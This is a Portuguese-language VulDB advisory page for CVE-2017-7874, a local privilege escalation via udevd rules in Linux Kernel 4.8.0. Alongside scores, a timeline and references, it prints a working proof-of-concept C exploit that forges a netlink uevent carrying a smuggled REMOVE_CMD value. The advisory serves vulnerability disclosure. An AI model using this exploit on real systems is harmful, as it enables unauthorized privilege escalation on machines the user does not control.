Linux Kernel 4.8.0 udevd 50-udev-default.rules Elevação de Privilégios

CVSS Meta Pontuação TemporáriaPreço atual do exploit (≈)Nota de Interesse CTI
5.0$0-$5k0.00

Sumárioinformação

Uma vulnerabilidade foi encontrada em Linux Kernel 4.8.0 e classificada como problemático. O impacto ocorre em uma função desconhecida na biblioteca /lib/udev/rules.d/50-udev-default.rules no componente udevd. O tratamento leva a Elevação de Privilégios. Esta vulnerabilidade é referenciada como CVE-2017-7874. O ataque precisa ser realizado localmente. Adicionalmente, há um exploit disponível.

Detalhesinformação

Uma vulnerabilidade foi encontrada em Linux Kernel 4.8.0 e classificada como problemático. O impacto ocorre em uma função desconhecida na biblioteca /lib/udev/rules.d/50-udev-default.rules no componente udevd. O tratamento leva a Elevação de Privilégios. Declarar o problema usando CWE resulta em CWE-77. A vulnerabilidade foi identificada em 15/04/2017. O problema foi divulgado 15/04/2017 (Site). O aviso pode ser baixado em exploit-db.com.

Esta vulnerabilidade é referenciada como CVE-2017-7874. A designação do CVE foi realizada em 14/04/2017. O ataque precisa ser realizado localmente. Informações técnicas estão acessíveis. A popularidade dessa vulnerabilidade é inferior à média. Adicionalmente, há um exploit disponível. O exploit foi tornado público e pode ser usado. Neste momento, o preço atual de um exploit pode ser cerca de USD $0-$5k agora. O projeto MITRE ATT&CK identifica a técnica de ataque como T1202.

Está declarado como prova de conceito. O exploit foi compartilhado para download em exploit-db.com. Como 0-day, o preço estimado no mercado negro era cerca de $0-$5k. O código utilizado pelo exploit é:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
 
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
 
int
main(int argc, char **argv)
{
  int sock;
  char *mp;
  char message[4096];
  struct msghdr msg;
  struct iovec iovector;
  struct sockaddr_nl address;
 
  memset(&address, 0, sizeof(address));
  address.nl_family = AF_NETLINK;
  address.nl_pid = atoi(argv[1]);
  address.nl_groups = 0;
 
  msg.msg_name = (void*)&address;
  msg.msg_namelen = sizeof(address);
  msg.msg_iov = &iovector;
  msg.msg_iovlen = 1;
 
  sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
  bind(sock, (struct sockaddr *) &address, sizeof(address));
 
  mp = message;
  mp += sprintf(mp, "a@/d") + 1;
  mp += sprintf(mp, "SUBSYSTEM=block") + 1;
  mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
  mp += sprintf(mp, "TIMEOUT=10") + 1;
  mp += sprintf(mp, "ACTION=remove") +1;
  mp += sprintf(mp, "REMOVE_CMD=/etc/passwd") +1;
 
  iovector.iov_base = (void*)message;
  iovector.iov_len = (int)(mp-message);
 
  sendmsg(sock, &msg, 0);
 
  close(sock);
 
  return 0;
}

A vulnerabilidade também está documentada em outros bancos de dados de vulnerabilidades: SecurityFocus (BID 97679).

Produtoinformação

Tipo

Fabricante

Nome

Versão

Licença

Site

CPE 2.3informação

CPE 2.2informação

CVSSv4informação

VulDB Vetor: 🔍
VulDB Fiabilidade: 🔍

CVSSv3informação

VulDB Meta Pontuação Base: 5.3
VulDB Meta Pontuação Temporária: 5.0

VulDB Pontuação Base: 5.3
VulDB Pontuação Temporária: 5.0
VulDB Vetor: 🔍
VulDB Fiabilidade: 🔍

CVSSv2informação

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VectorComplexidadeAutenticaçãoConfidencialidadeIntegridadeDisponibilidade
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear

VulDB Pontuação Base: 🔍
VulDB Pontuação Temporária: 🔍
VulDB Fiabilidade: 🔍

Exploraçãoinformação

Classe: Elevação de Privilégios
CWE: CWE-77 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍

Físico: Parcial
Local: Sim
Remoto: Não

Disponibilidade: 🔍
Acesso: Público
Estado: Prova de conceito
Autor: Nassim Asrir
Linguagem de programação: 🔍
Descarregar: 🔍
Tendência de preços: 🔍
Estimativa de preço atual: 🔍

0-DayDesbloquearDesbloquearDesbloquearDesbloquear
HojeDesbloquearDesbloquearDesbloquearDesbloquear

Exploit-DB: 🔍

Inteligência de ameaçasinformação

Interesse: 🔍
Atores ativos: 🔍
Grupos APT ativos: 🔍

Contramedidasinformação

Recomendação: nenhuma medida conhecida
Estado: 🔍

Tempo 0-dia: 🔍
Tempo de atraso de exploração: 🔍

Linha do tempoinformação

14/04/2017 🔍
15/04/2017 +1 dias 🔍
15/04/2017 +0 dias 🔍
15/04/2017 +0 dias 🔍
15/04/2017 +0 dias 🔍
15/04/2017 +0 dias 🔍
16/04/2017 +1 dias 🔍
27/12/2024 +2812 dias 🔍

Fontesinformação

Fabricante: kernel.org

Aconselhamento: 142152
Estado: Confirmado

CVE: CVE-2017-7874 (🔍)
GCVE (CVE): GCVE-0-2017-7874
GCVE (VulDB): GCVE-100-99901
SecurityFocus: 97679 - Linux Kernel CVE-2017-7874 Local Privilege Escalation Vulnerability
OSVDB: - Linux Kernel udev command execution

scip Labs: https://www.scip.ch/en/?labs.20161013

Entradainformação

Criado: 16/04/2017 10h46
Atualizado: 27/12/2024 09h32
Ajustamentos: 16/04/2017 10h46 (52), 17/09/2020 18h46 (5), 29/11/2022 14h32 (2), 27/12/2024 09h32 (14)
Completo: 🔍
Cache ID: 216::103

If you want to get the best quality for vulnerability data then you always have to consider VulDB.

Discussão

Ainda sem comentários. Idiomas: pt + es + en.

Por favor, inicie sessão para comentar.

VoltarVisão GeralPróximo

Do you know our Splunk app?

Download it now for free!